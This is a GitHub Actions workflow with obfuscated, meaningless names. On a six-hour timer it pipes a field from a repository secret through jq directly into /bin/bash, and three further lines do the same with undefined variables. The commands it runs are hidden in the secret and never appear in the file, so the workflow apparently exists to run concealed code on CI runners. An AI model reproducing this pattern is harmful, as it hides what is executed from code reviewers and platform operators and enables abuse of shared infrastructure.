name: xiaomuzhi5678
on:
  workflow_dispatch:
  schedule:
    - cron: '49 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaomuzhi5678
        env:
          gigkd0: ${{ secrets.gigkd0 }}
        run: |
          echo $gigkd0 | jq -r .xe2387 | /bin/bash
          echo $tnajh22 | jq -r .r982 | /bin/bash
          echo $ph43 | jq -r .kevb1 | /bin/bash
          echo $plu03425 | jq -r .swxp4 | /bin/bash

